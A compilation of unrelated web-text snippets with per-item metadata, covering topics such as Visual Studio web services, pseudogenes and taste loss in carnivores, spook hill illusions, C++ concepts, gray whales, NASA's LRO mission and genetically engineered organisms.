Web services provide programmatic access to application logic using standard Web protocols, such as XML and HTTP. Web services can be either stand-alone applications or sub-components of a larger Web application. Web services are accessible from just about any other kind of application, including other Web services, Web applications, Windows applications, and console applications. The only requirement is that the client must be able to send, receive, and process messages to and from the Web service. For more information, see Programming the Web with Web Services.
These walkthroughs cover two logically separate development paths: creating Web services and accessing Web services. Although you may be both the creator and the user of a particular Web service, the processes are distinctly separate. Of course, you need to create a Web service before you can access it.
The walkthroughs on creating Web services use two separate technologies for implementing a Web service. In all cases, you create the same Web service functionality; the only difference is the method of implementation.
The walkthroughs on accessing Web services focus on the steps necessary to access Web services from managed code and from unmanaged code. In each walkthrough, the client application accesses the Web service using a proxy class generated by Visual Studio, and you will access a Web service created in one of the above "Creating a Web Service..." walkthroughs. As such, it is necessary to complete at least one of the "Creating a Web Service..." walkthroughs prior to attempting one of the "Accessing a Web Service..." walkthroughs.
<urn:uuid:31632f8c-d61e-4098-9516-7687ee0c0c50>
2.84375
324
Tutorial
Software Dev.
38.434198
Marine Wildlife Encyclopedia
Roundworm Dolicholaimus marioni
It is hard to see which end is which on a roundworm, as both ends of its thin body are pointed. The body is round in cross-section and has longitudinal muscles but no circular ones. This results in a characteristic way of moving in which the body is thrashed in a single plane, forming C- or S-shapes in the process. This is a marine species, but roundworms also occur in vast numbers in soil and fresh water.
- Phylum Nematoda
- Length Up to 0.2 in (5 mm)
- Depth Intertidal
- Habitat Among algae in rock pools
- Distribution Shores of the northeastern Atlantic
<urn:uuid:1994bb24-77ac-40fe-b11c-72126b68bf72>
3.609375
150
Knowledge Article
Science & Tech.
43.913333
Pseudogenes are genes that used to have a function, but no longer do. If a gene contributes to an important function for the organism, offspring with deleterious mutations that ruin the gene will have lower fitness, and as a result won't have as many offspring, if any at all. That mutated gene will likely not go to fixation (i.e., spread until essentially the whole population carries it). On the other hand, if the gene used to have a function but no longer does, then mutations affecting the gene won't be deleterious. Mutations that turn off its expression (so the protein the gene codes for is no longer produced), and mutations that mess up the amino-acid sequence of the protein (so the protein can't carry out the previous function), won't be detrimental to the individual that has those mutations if the individual no longer needs that function. As a result, those mutations can go to fixation either by genetic drift (i.e., at random), or can even be selected for (e.g., when there is a cost to producing the protein). However, examples where pseudogenization is coupled to function are rare. A new study published in PNAS links genes that code for taste receptors to specific dietary changes in carnivorous mammals. Basically, animals that do not eat sweets don't have receptors for sweetness (e.g., cats), and animals that swallow their food whole have no receptors for umami (e.g., sea lions, dolphins). Mutations causing loss of the sweet-taste receptor gene are in red. The exons (DNA coding for a protein) are intact for the dog, which can taste sweet just fine, compared to the exons for various other carnivores, which cannot taste sweet, the poor souls. Examples of what the mutations actually do: it looks like they typically cause frameshifts, which make the rest of the gene nonsense, and introduce stop codons, which cause translation to stop prematurely. The first one, with Sea and Fur Seals, shows a mutation that messes up the promoter region of the gene, thereby ruining gene expression. Phylogenetic tree showing loss (diamonds) of Tas1R2, one of the genes coding for a protein that enables animals to taste sweet. In this way, several species have lost taste receptors, and they have done so independently. The Fossa of Madagascar has lost the gene for sweet taste, but its closest relative examined, the Yellow Mongoose, has not. The red diamonds in this phylogenetic tree indicate the lineages in which the gene for sweet taste has become a pseudogene. The results strongly suggest that loss of the gene has occurred multiple times, rather than once in a common ancestor. Measuring the strength of selection along these branches, the authors found that the ratio of non-synonymous to synonymous substitutions, dN/dS (aka ω), is considerably lower for the species that can still taste sweet, compared to those that can't. An ω lower than one means that mutations that change the amino-acid sequence aren't tolerated, while those that don't (the synonymous mutations) are. So this lower ratio means that there is strong purifying selection on the gene when the gene is still in use, whereas when ω is higher, selection doesn't care much about the gene. However, the best model fit was one where the branches leading to species with intact taste receptors had ω = 0.13656, while the others had ω = 0.41974. That is, while the latter branches are found to have been under relaxed selection compared to the former, the fact that ω isn't (close to) 1 suggests that selection isn't wholly indifferent to the state of the protein.
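As a concrete illustration of the ω statistic just discussed, here is a crude, Nei-Gojobori-flavored sketch (my own addition with invented counts; the paper itself fits codon-substitution models by maximum likelihood):

#include <cstdio>

// dN/dS (omega): the per-site rate of non-synonymous substitution
// relative to the per-site rate of synonymous substitution.
// The counts below are made up purely for illustration.
double omega(double nonsyn_subs, double nonsyn_sites,
             double syn_subs,    double syn_sites) {
    double dN = nonsyn_subs / nonsyn_sites; // non-synonymous rate
    double dS = syn_subs / syn_sites;       // synonymous rate
    return dN / dS;
}

int main() {
    // Purifying selection: amino-acid changes are purged, omega << 1.
    std::printf("intact receptor: omega = %.2f\n", omega(12, 700, 30, 240));
    // Relaxed selection on pseudogenized branches: omega drifts toward 1.
    std::printf("pseudogenized:   omega = %.2f\n", omega(35, 700, 29, 240));
    return 0;
}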
The authors themselves are at a loss as to the nature of this mechanism: Recently, sweet, umami, and bitter taste receptors have been implicated in several extraoral functions (36). Pseudogenization of Tas1r receptor genes in dolphins and sea lions and Tas2r receptor genes in dolphin indicates that these receptors cannot be involved in extraoral (e.g., gut, pancreas) chemosensation (36) in these species. Thus, to the extent that these extraoral taste receptors are functionally significant in rodents and humans, these functions must have been assumed by other mechanisms in the species we have identified here with pseudogenized receptors. What these other mechanisms are remains to be determined, and further assessment of the relationships among taste receptor structure, dietary choice, and the associated metabolic pathways will lead to a better understanding of the evolution of diet and food choice as well as their mechanisms. One of the species in the order Carnivora is the Banded Linsang, which lives in tropical forests of Thailand, Malaysia, Borneo, and Java. I include a picture of it here just because I have never seen this creature before, and because it is super adorable. It is a close relative of cats, and cannot taste sweet. Jiang P, Josue J, Li X, Glaser D, Li W, Brand JG, Margolskee RF, Reed DR, & Beauchamp GK (2012). Major taste loss in carnivorous mammals. Proceedings of the National Academy of Sciences of the United States of America PMID: 22411809
<urn:uuid:6a1119ca-a9da-4519-b421-7807e88791d8>
3.546875
1,102
Academic Writing
Science & Tech.
46.716962
EXPLANATION OF PLAN CHECK The purpose of this plot is to check for sun danger, estimate SEPS cumulative sun exposure time, and gauge how well the modeled magnetic field lies in the SEPS field of view. - The absolute value of the pitch angle difference between the boresight and the sun vector is shown in the top panel. When the absolute value of the sun latitude is less than or equal to 20 degrees and the difference in pitch angle is less than 24 degrees a sun violation message occurs. The dashed horizontal line indicates the SEPS anti-boresight violation zone. - The middle panel indicates the cumulative SEPS sun exposure time. - The bottom panel indicates the angle between the boresight direction and the Earth centered dipole magnetic field. Scott Boardsen, firstname.lastname@example.org Last updated on April 30, 1996
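The violation rule in the first bullet above can be restated as a simple predicate (a hypothetical paraphrase in code; the names and types are mine, not from the SEPS software):

#include <cmath>

// Sun-violation test as described above: flag a violation when the sun
// latitude is within 20 degrees of the equator and the boresight-to-sun
// pitch-angle difference is under 24 degrees.
bool sun_violation(double sun_latitude_deg, double pitch_diff_deg) {
    return std::fabs(sun_latitude_deg) <= 20.0 &&
           std::fabs(pitch_diff_deg) < 24.0;
}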
<urn:uuid:b7850c01-a071-4c3b-9f07-4ea3c12fea7f>
2.921875
186
Documentation
Science & Tech.
41.301533
In 2002 and 2003, over 1500 square miles of southern California burned in firestorms unequaled for over a century, the largest fires since accurate records have been kept. Because of the fires' unprecedented size, their effects on the ecosystem were unknown and unpredictable. Over 738 square miles burned in San Diego County alone, 17.4% of the county's total area and nearly 25% of the area still covered by natural vegetation. The Cedar fire of October 2003 alone burned 436.4 square miles and was the single most pervasive disaster in San Diego history. The fires killed 17 people, compelled the evacuation of thousands, burned 2454 houses, blanketed the region under dense smoke for a week, and shut down business in the city of San Diego for two days.
Areas burned in San Diego County in 2002 and 2003
These wildfires also reignited the debate among resource managers, politicians, scientists, and the public about the strategies appropriate for people to live in the fire-prone ecosystems of southern California. This debate among vegetation and fire ecologists began in the early 1980s (Keeley 1982, Minnich 1982, Minnich and Chou 1996, Keeley 2002) but has now sprung to the forefront of public attention and of resource managers' needs. Developing fire-management strategies in southern California, particularly in coastal sage scrub and chaparral, is particularly difficult because the area is a biodiversity hotspot and supports a large number of threatened and endangered species. Guidelines for prescribed fires must minimize their effect on a wide array of species while simultaneously helping to prevent fires that might threaten lives and property. Such guidelines can be developed only with detailed information on species' responses to fire and subsequent patterns of recovery. Yet in spite of the central role of fire in southern California's biology, few studies have addressed the responses of any vertebrate to fire, and little is known about how animals recover following fire or what interventions, if any, may be necessary to assist ecological recovery. Our team has two studies focused on understanding mammals' responses to fire. One, in chaparral in the Cleveland National Forest, is examining how rodents and other small mammals, carnivores, and bats recover from fire, with a special emphasis on how proximity to unburned habitat and fire severity influence recovery. The other study, in coastal sage scrub in Rancho Jamul Ecological Reserve, addresses rodents' responses to fire, taking into account the influence of the abundance of exotic plants before and after fire. Our results will ultimately aid the responsible authorities in designing guidelines for how to prepare for fire. The influence of fire severity on mammals' recovery can be incorporated into considerations regarding fuel status and fire weather before a fire breaks out. The temporal and spatial patterns of mammal recovery can be used to guide minimum fire intervals as well as maximum fire sizes in plans for controlled fires. The effects of the abundance of exotic plants, which may be enhanced by frequent fire, can be used to guide postfire management interventions to assist recovery. As a whole, the information resulting from these studies will aid planning for fire management with the minimum effect on southern California's mammals. In 2002, the San Diego Natural History Museum began a series of studies on the effects of fire on the birds and mammals of San Diego County.
These studies were funded by California State Parks, the Joint Fire Science Program, and the U.S. Forest Service. We are currently synthesizing the results from these studies in ways to inform monitoring and adaptive management techniques and strategies. This project is funded by a grant from the Blasker Environment Grant Program of the San Diego Foundation.
<urn:uuid:ab9cef0a-d0d2-4f29-b58f-793f491fe53f>
3.765625
746
Academic Writing
Science & Tech.
26.198883
In ecology, predation describes a relationship between two creatures: a predator attacks and eats its prey. Predators may or may not kill their prey before eating them, but the act of predation always ends in the death of the prey and the absorption of the prey's tissues into the predator's body. A true predator can be thought of as one which both kills and eats another animal. A predator is an animal that hunts, catches and eats other animals. For example, a spider eating a fly caught at its web is a predator, as is a pack of lions eating a buffalo. The animals that the predator hunts are called prey. Predators are usually carnivores (meat-eaters) or omnivores (animals that eat both plants and other animals). Predators hunt other animals for food. Examples of predators are lions, tigers, leopards, crocodiles, snakes, eagles, wolves, killer whales, and sharks. Predators are usually defined as animals that eat other animals, but to some scientists the word predator means any living organism that eats another: by that definition, a cow eating grass would be a predator of that grass. Plants are not predators because they make their own food. Predators and prey each show their own characteristic adaptations.
A lioness with her prey.
<urn:uuid:fcbb6cd8-eb08-47d8-aecd-78f0dc44a9c9>
3.671875
264
Knowledge Article
Science & Tech.
52.49105
Spook Hills in the Lab
Spook hills, also known as antigravity or magnetic hills, are natural places where cars in neutral gear seem to move uphill on a slightly sloping road, seemingly defying the laws of gravity. The phenomenon, found all over the world, has long kept both paranormal believers and skeptics wondering. Some have suggested, as an explanation for the strange occurrence, that magnetic or gravitational anomalies exist, caused by mysterious magnetic sources underground or by secret military experiments. Magnetic causes can be ruled out easily, though, because the effects are visible even on nonmagnetic materials, such as plastic balls or water poured on the ground. The answer to this mystery is found using a simple tool. When the inclination of several such roads has been measured using spirit levels, the actual slope of the surface has consistently been found to be opposite to the apparent one. To answer the objection that gravitational anomalies would influence the level as well, my good friend and longtime colleague Luigi Garlaschelli, from the University of Pavia in Italy, also took measurements on an Italian spook hill in Montagnaga (Figure 1) from a distance (i.e., away from the stretch of road in question) using a professional surveyor's instrument called a theodolite. Garlaschelli first checked the parallelism between a plumb line hanging within the critical area and another outside of it; then height readings were taken on graduated yardsticks. The real slope was calculated at about 1 percent of the apparent slope, in the opposite direction. The simpler explanation for spook hills, then, is that they are visual illusions in a natural environment.
A Portable Spook Hill Experiment
Recently, Garlaschelli, along with Paola Bressan, a researcher at the Department of Psychology at the University of Padua, and Monica Barracano, also of Padua, published a report on spook hills in Psychological Science, the journal of the Association for Psychological Science (previously known as the American Psychological Society). In the article, they describe four experiments showing that this phenomenon can be reproduced in a laboratory. The researchers find that the phenomenon is due to the visual anchoring of the spooky surface to a gravity-relative eye level whose perceived direction is biased by sloping surroundings. In the first experiment, for example, they built a tabletop model with three hinged, moveable boards (Figure 2) to investigate the case in which the critical spot is a sloping stretch of road between two other stretches that both run either uphill or downhill as one moves forward from the observation point at one end. Because their model was 2.4 meters long, devoid of visible texture, and viewed monocularly through a reduction screen, most depth cues (aerial perspective, texture gradients, and binocular cues such as disparity and convergence) were absent.
Figure 2: Schematic illustration of the tabletop model used in Experiment 1 (L marks where the viewing hole was located, and at N a few small model trees were added for realism).
Sixty undergraduate students were divided into three groups of twenty subjects each, with each group seeing two or three of the eight different levels of inclination. All subjects were unaware of the actual setup and purpose of the experiment. In the experiment, the subjects sat in front of the screen one at a time.
They were asked to look into a hole and describe what they saw and then assess the slope of the three stretches on a five-point scale that ran from strongly downhill to strongly uphill. Each trial was followed by a break of about one minute, during which the hole was occluded and the model modified. The results of the experiment showed that slants are generally underestimated. Three stretches with the same slant were seen as horizontal by all subjects, whether they were truly horizontal, downhill, or uphill. A slightly downhill stretch between two strongly downhill inclines was seen as illusorily uphill by sixteen out of twenty subjects and as illusorily horizontal by the other four. This illusory effect explains what occurs at Gravity Hill in Pennsylvania. However, a slightly uphill stretch between two strongly uphill inclines was seen by all subjects as level, not as downhill as might be expected in light of the previous finding. This result implies that inducing an illusory downhill effect is not nearly as easy as inducing an illusory uphill effect. In a further experiment, Garlaschelli and his team found that steeper inducing slopes are required to suggest an uphill slant. "After each observer's task was concluded," say Bressan and her colleagues, "we placed a small roll of tape on the misperceived slope, and the tape appeared to move against the law of gravity, producing surprise and, on occasion, reverential fear." Interested readers can find details on the team's various experiments in the September 2003 (14:5) issue of Psychological Science.
Experience the Spooky Effect
"The visual (and psychological) effects obtained in our experiments were in all respects analogous to those experienced on site," the researchers concluded. "The more than twenty natural cases of antigravity hills reported to date are all variations on a single theme. Our study shows that the phenomenon can be recreated artificially, with no intervention whatsoever of magnetic, antigravitational, or otherwise mysterious forces. The spooky effects experienced at these sites are the outcome of a visual illusion due to the inclination of a surface being judged relative to an estimated eye level that is mistakenly regarded as normal to the direction of gravity. Using miniature or even life-size reproductions of our tabletop models, it should now be easy to re-create the fascination of this challenge to gravity in amusement parks and, for twice the benefit, science museums anywhere."
If you’d like to experience a spook hill for yourself, Bressan and colleagues have prepared this list of the best known ones: - United States: Confusion Hill, Idlewild Park, Ligonier, Pennsylvania; Gravity Hill, northwest Baltimore County, Maryland; Gravity Hill, State Route 42, Mooresville, Indiana; Gravity Hill, State Route 96, south of New Paris, Bedford County, Pennsylvania; Gravity Hill, White’s Hill, Rennick Road, La Fayette County, Wisconsin; Gravity Road, Ewing Road, Route 208, Franklin Lakes, Washington; Mystery Hill, Highway 321, Blowing Rock, North Carolina; Mystery Spot, Putney Road, Benzie County, Michigan; Spook Hill, North Wales Drive, North Avenue, Lake Wales, Florida; Spook Hill, Gapland Road, Burkittsville, Frederick County, Maryland - Canada: Gravity Hill, McKee Road, Ledgeview Golf Course, Abbotsford, British Columbia; Magnetic Hill, Neepawa, Manitoba; Magnetic Mountain, Canada Highway, Moncton, New Brunswick - Europe: Ariccia, Rome, Italy; Electric Brae, A719, Croy Bay, Ayr, Ayeshire, Scotland; Malveira da Serra, Road N247, Lisbon, Portugal; Martina Franca, Taranto, Italy; Montagnaga, Trento, Italy; Mount Penteli, Athens, Greece - Other countries: Anti-Gravity Hill, Straws Lane Road, Wood-End, Victoria, Australia; Morgan Lewis Hill, St. Andrew, Barbados; Mount Halla, Cheju Do Island, South Korea. Readers who know of other spook hills are invited to write to us with their locations.
<urn:uuid:58c099e4-2104-4bf8-8b2d-a80fe779dd68>
3.078125
1,568
Knowledge Article
Science & Tech.
23.87318
Mostly found in Southeast Asian countries such as Indonesia, this moth is called Attacus atlas, or sirama-rama, or kupu gajah, which translates as "elephant butterfly," after its large size. The pretty 21-centimeter moth was dying when Jhony took these photographs. According to Javanese mythology, the presence of Attacus atlas brings fortune or foretells the coming of guests. Atlas moth wingspans can reach over 25 cm, and females are apparently larger and heavier; Jhony said this moth was female. In Hong Kong, people call it the "snake's head moth," referring to the apical extension of the forewing, which resembles the reptile. This resemblance, complete with the eyes of a snake, is used to scare predators. Unfortunately, as Jhony held the moth, it flew to the main road and was crushed by a truck.
<urn:uuid:2464cd91-aaa4-4a62-ba73-5ee6c748f7cd>
2.984375
211
Personal Blog
Science & Tech.
44.909849
#1: "#include <file.h>" does exactly the same thing as opening file.h and copy-pasting it where the "#include <file.h>" statement is located. No more, no less.
#2: preprocessor directives are the things that start with a "#" hash sign. They can be used for preprocessor macros (you generally want to stay away from those), pragmas to control compiler-specific behaviour, the classic #ifdef/#endif, and perhaps the most important, #include.
#3: you use loops when you need a loop?
#4: cin/cout are C++ iostreams, which are a lot more flexible than C-style scanf/printf (they let you write your own output formatters, and a lot more). They also have the potential to be buffer-overflow safe, which scanf/printf aren't.
#5: type checking is done all the time by the compiler, to ensure you don't shoot off your leg doing something stupid. C has pretty weak type checking; C++ has relatively strong but not over-insane type checking (contrast that to Pascal, which has 'char' and 'byte' types that need typecasting >_<). You use typecasting when you need to convert one "unrelated" type to another - this doesn't happen often with decently designed C++ code, but happens a lot if you need to interface with legacy C code. A prime example is using the PlatformSDK for Windows.
#6: dynamic binding/polymorphism... let's say you have a whole class of output streams you can support (to file, to console, to network, to memory...). You design an interface class for this, with all virtual functions. You can't instantiate this interface class directly, but you can instantiate the concrete derived classes (ie, FileStream, NetworkStream, ...), and all code that uses the streams can use the GenericStream class interface. Using dynamic binding, the "generic" calls are bound to the "concrete" calls of the class you're using. That explanation was probably a bit confusing, but it's pretty simple in practice - see the sketch below.
#7: a reference variable is similar to a pointer variable, but they're not equal. One thing is the syntactic sugar: with a pointer, you need to do "*ptr = value" or "ptr->field = value". With a reference, you can simply do "ref = value" or "ref.field = value". Also, references can't be reassigned, and they don't take up any additional memory - they are the variables they refer to. Think of them as aliases.
#8: namespaces are wonderful. Basically, they were created to avoid polluting the global namespace and having variable/function/class name clashes in large projects, or when using libraries. If two people wrote functions called SuperFormatter(), you'd usually be in trouble, but if they were put in separate namespaces, you aren't.
PS: is this a homework assignment?
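A compact sketch tying #6 and #7 together (my own illustration, not code from the original thread):

#include <iostream>
#include <string>

// #6: an abstract stream interface; the virtual call is bound at run time.
struct GenericStream {
    virtual void write(const std::string& s) = 0;
    virtual ~GenericStream() = default;
};

struct ConsoleStream : GenericStream {
    void write(const std::string& s) override { std::cout << s << '\n'; }
};

void log(GenericStream& out) {   // works with any concrete stream type
    out.write("hello");          // dynamic binding picks the right override
}

int main() {
    ConsoleStream cs;
    log(cs);

    // #7: a reference is an alias, not a reseatable pointer.
    int x = 1;
    int& ref = x;            // from here on, ref *is* x
    ref = 42;                // assigns through the alias...
    std::cout << x << '\n';  // ...so this prints 42
    return 0;
}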
<urn:uuid:95ed6101-606d-4b26-b0cf-560c7f112ad2>
3.640625
645
Comment Section
Software Dev.
59.262653
Whales: Weathering Change?
from Wayne Perryman, Biologist
Perryman is the government's leading expert on gray whale cows and calves. He counts them each spring as they pass the California coast at Pt. Piedras Blancas on their way to Alaska. Perryman reminds us, "Most of the eastern Pacific population of gray whales feeds in the Arctic during the summer to early fall. That environment has changed significantly over the past 15 years. As the climate warms, ice gets thinner and it covers less area. This change impacts a wide range of marine mammals (seals, walrus, whales). Now, we can feel comfortable saying that gray whales are feeding in different places (farther north) and on different prey than they did back in the 1980s."
Changes in Feeding Areas
Before leaving their arctic homes and migrating south to Baja Mexico, gray whales feast on tiny crustaceans that live on the sea floor. This is how whales put on thick layers of blubber to help sustain them during their migration south, the winter in Mexico's lagoons, and the return migration north. As warming waters melt the sea ice, other animals move into the whales' feeding grounds. Crowded by the new competition for food, gray whales then must travel farther north and feed longer to get filled up and gain blubber.
Changes in Migration Timing
Changes in the Arctic, say scientists, have disrupted the timing of the whales' migration. Whale watchers and marine scientists note that gray whales have been delaying their southward migrations as they stay longer to eat. For example, compared to two decades ago, gray whales are reaching the lagoons later. "This isn't trivial," says Mr. Perryman. "It's a significant change." It takes a long time series of data to know how this is affecting the whale population. Climate changes slowly in the long term while weather can fluctuate widely in the short term, so it takes time to tease out the long-term effects from the short-term ones.
Changes in Population Growth
"It appears that growth of the gray whale population has slowed and may have stopped. Also, reproduction (indicated by the number of calves migrating north) has fluctuated widely, and in general has been lower than we would expect for a growing population. How this all fits into the picture of climate change effects is a good question. Perhaps YOU will become a scientist and help to figure it out!"
Try This! Journal Questions
Learn more about Mr. Perryman here. Think about how his life prepared him for the job he has today. What things do YOU enjoy doing that might lead to enjoyable work in your future?
- What would be some consequences for the gray whale food supply if arctic ice continues to melt later and to cover less area?
- How might changes in the whales' migration schedule affect them?
- Of the challenges you know about today, which do you think are most important for scientists to be studying? Explain.
Find out more about gray whales and list factors that might make the species' population decrease.
<urn:uuid:08f78000-12d3-44c1-9bf0-175757472821>
3.953125
657
Knowledge Article
Science & Tech.
56.943793
LRO stands for Lunar Reconnaissance Orbiter. It is a robotic spacecraft that is orbiting, or flying around, the moon. LRO will take pictures of the moon's surface. It will help NASA learn more about the moon. LRO launched in June 2009. How Will LRO Study the Moon? LRO has six different science instruments. The orbiter will gather more information about the moon than NASA has ever known. NASA will use all this to plan and build a moon outpost someday. One goal of LRO is to find safe landing sites on the moon. LRO will look for natural resources that people living on the moon could use. It will measure the temperatures on the moon to find the best place for humans to build a lunar base. LRO will study the moon's high and low places. NASA will use that information to make 3-D maps of the moon. The maps will help NASA choose places for future spacecraft to land on the moon. A telescope on LRO will measure how much radiation is on the moon. What is learned could help NASA find ways to protect astronauts and keep them safe while on the moon. Another piece of equipment will study the moon's soil, which is called regolith. The tool will also look for water ice near the moon's surface. Water, in the form of ice, on the moon could be used for many things. Water can provide oxygen for astronauts on the moon to breathe. Water can also provide hydrogen to be used as rocket fuel. A camera on LRO will take pictures to help find landing sites. NASA hopes all these instruments will give the agency the best information ever gathered about the moon. When Did LRO Launch? LRO launched from NASA's Kennedy Space Center in June 2009. It rode on an Atlas V (5) rocket. The trip to the moon took about four days. LRO is now orbiting the moon. During each orbit, the spacecraft flies over the moon's north and south poles. When a spacecraft does this, the orbit is called a polar orbit. LRO will fly about 31 miles, or 50 kilometers, above the moon's surface. The spacecraft will orbit the moon for at least one year. Why Is NASA Studying the Moon? LRO is NASA's first step toward returning humans to the moon. NASA and scientists around the world want to study the moon. What they learn will help NASA get ready to send astronauts there and to build a lunar outpost. Astronauts can explore the moon to learn more about the history of Earth, the solar system and the universe. Astronauts could also learn things on the moon that could help life on Earth. Another reason to study the moon is to help people go to other places like Mars and beyond. By going to the moon first, NASA can test much of what will be needed for future missions. Using the moon as a practice ground will help make future missions safer. What Is LCROSS? LCROSS is a satellite that launched with LRO. LCROSS will crash into the moon and search for water. Shortly after launch, LRO and LCROSS separated. They flew to the moon on two separate paths. LCROSS is made up of two parts. When it is time for LCROSS to work, it will fly close to the moon and the two parts will separate. The first part will hit the moon near one of its poles. The impact will make a crater about one-third the size of a football field. The crater will be about as deep as the deep end of a swimming pool. The impact will also make dust and ice on the moon's surface fly out of the crater. Scientists guess that the amount of stuff that will fly out of the crater could fill 10 school buses. The second part of LCROSS will then fly through the dust and ice and study them. 
The second piece will also hit the moon. It will land several miles away from the first piece. LRO and LCROSS are part of NASA's Lunar Precursor Robotic Program. The program manages robotic missions that are leading the way back to the moon.
Heather R. Smith/NASA Educational Technology Services
<urn:uuid:a5dc9ced-68d4-40df-9d3e-c9a67fbd7a40>
4.15625
916
Knowledge Article
Science & Tech.
72.418384
00:00 04 February 2009
Whales evolved from land mammals sometime between 50 and 30 million years ago. New Scientist discovers what the transition species might have looked like.
Whales evolved from split-hooved land mammals. Very little is known about the animals that first ventured into the water, so drawings are entirely speculative. This is one interpretation of what a Pakicetid may have looked like. Pakicetids are sometimes described as the "first whales": they were mostly land-based, but the structure of part of their inner ear is very unusual and resembles only the ear structure of modern and fossil cetaceans. (Image: Carl Buell, courtesy of the Thewissen lab)
<urn:uuid:d052679f-4d16-4afe-a964-be5a66b65bc2>
3.53125
149
Truncated
Science & Tech.
38.566522
Eco-restructuring: Implications for Sustainable Development (UNU, 1998, 417 p.) - Part I: Restructuring resource use - 3. Ecological process engineering: The potential of bio-processing
To implement and accelerate these changes, a number of conditions must be met. Most of the points made in this section have already been made, but need emphasis. For one thing, it is vitally important to preserve biodiversity, not just for its own sake, but to preserve the genetic information embodied in living organisms. It is not just a question of finding whole organisms with valuable properties. It may be equally important to find organisms with just one valuable property that can be traced to a particular gene or group of genes. It is this possibility that raises hopes of giving food crops the ability to fix nitrogen, or to resist insects, or to tolerate saltier water or colder or hotter temperatures, or to metabolize and break down chlorinated aromatics, such as PCBs, and so on. It is also important to focus more research on bio-processing. The potential for substituting organic enzymes for inorganic catalysts is worthy of far more attention than it has ever received. The same is true of the use of microorganisms for processing low-grade metal ores or purifying industrial wastes containing heavy metals. Of course, it is important to develop and to use genetically engineered organisms (GEOs) in a sustainable way. This will require extensive and coordinated research in other sciences, including social and cultural factors. A series of open questions must be asked and answered concerning any application of GEOs. There are scientific arguments for questioning the scientific validity of the basic premises of genetic engineering. A major assumption is that each specific feature of an organism is encoded in one or a few specific, stable genes, so that transferring a gene results in the transfer of a discrete feature, and nothing else. This, however, represents an extreme form of genetic reductionism. It fails to take into account the complex interactions between genes and their cellular, extra-cellular, and external environments. Changing a gene's environment can produce a cascade of further unpredictable changes that could conceivably be harmful. In the case of genetic transfer to an unrelated host it is literally impossible to predict the consequences: the stabilizing "buffering" control circuits for a gene are exposed to disruption and may be ineffective in new hosts. Owing to the high degree of complexity of any living organism, firm predictions of outcomes are nearly impossible because genomes are known to be "fluid." In other words, they are subject to a host of destabilizing processes such that the transferred gene may mutate, transpose, or recombine within the genome. It can even be transferred to a third organism or another species. In short, the evolutionary stability of organism and ecosystem may be disrupted and threatened. Like the genie in the bottle (in the tale of Aladdin's lamp), once a GEO is deliberately released, or inadvertently escapes from containment, it can never be recalled, even if adverse effects occur. GEOs may migrate, mutate, and multiply. In addition, there are serious ethical issues concerning the patenting and ownership of life-forms, including implications for cultural values and for indigenous peoples and poor countries. Editor's note: It is impractical to summarize these issues here, but it is clear that there are many legitimate concerns.
Scientists and the business world tend to take the view that the general public should be excluded from the inner circles of decision-making, on grounds of inadequate technical knowledge. But this attitude is essentially undemocratic. It is also likely to backfire. It is worthwhile recalling that nuclear power technology has been discredited largely as a result of public distrust of what the so-called "experts" in government and industry were telling them. To overcome the public knowledge gap, some countries are organizing lay conferences (e.g. NEM 1996). As an exemplary case, Norway's Gene Technology Act, section 10 (Norway 1993), includes four criteria for a GEO to be acceptable:
- safe to people
- safe to the environment, i.e. the entire ecosphere
- beneficial to the community
- contributing to sustainable development.
Of course, these criteria are quite general. There are endless arguments over how these criteria should be tested and measured. More specific criteria to qualify a micro-organism as "environmentally safe" have been put forward. For instance (Lelieveld et al. 1993):
- non-pathogenic for plants and animals
- unable to reproduce in the open environment (including by delayed reproduction of survival forms such as spores)
- unable to alter equilibria irreversibly between environmental microbial populations
- unable, in the open environment, to transfer genetic traits that would be noxious in other species.
Editor's note: The overriding concern will be safety. It is all too easy to envision GEOs escaping into the natural environment and causing irreversible changes in natural ecosystems. The damage that can be caused by species being introduced inadvertently into environments where they have no natural enemies is well known. A few reminders will help make the point. The rabbit, no problem in Europe, became a major pest when it was introduced into Australia. The sea lamprey, introduced into the Great Lakes via the Welland Canal, has caused great harm to the freshwater fishery there. Dutch elm disease, imported to North America from Europe, has virtually wiped out the most beautiful shade trees of the eastern part of the continent. Another disease of unknown origin has totally wiped out the American chestnut trees, which once dominated the eastern forests. The Japanese beetle also caused enormous damage to agriculture before it was brought under control by pesticides. If such damage can be caused by species that already exist, some sceptics will (and do) argue that the problem could be worse with deliberate genetic manipulation in the picture. But even the foregoing criteria are ambiguous in a number of ways, because it is unclear how it is to be determined whether or not the criteria are satisfied. It is likely that, in practice, the process of testing and certification for GEOs will be no less rigorous (and possibly much more so) than the current process for drug testing in the United States. Moser takes the view that deliberate ecosystem modification (whether or not GEOs are involved) is wrong and should be prohibited on the grounds of being "contra natural" (owing to its "invasiveness"). In principle it is easy to agree, but in practice it seems unlikely that Moser's view will prevail. Apart from safety and environmental security, there are a number of other questions to be asked and answered with respect to any proposed application. These include questions concerning costs, benefits, and secondary impacts (e.g.
reduced need for extractable raw materials, reduced CO2 emissions, remediation of polluted rivers, lakes, or soil, and the maintenance of biodiversity). But, again, it is impossible to go further into detail here.
<urn:uuid:a19a5f55-dbfe-47d7-a137-9d7f582a5bfb>
2.9375
1,434
Knowledge Article
Science & Tech.
27.242174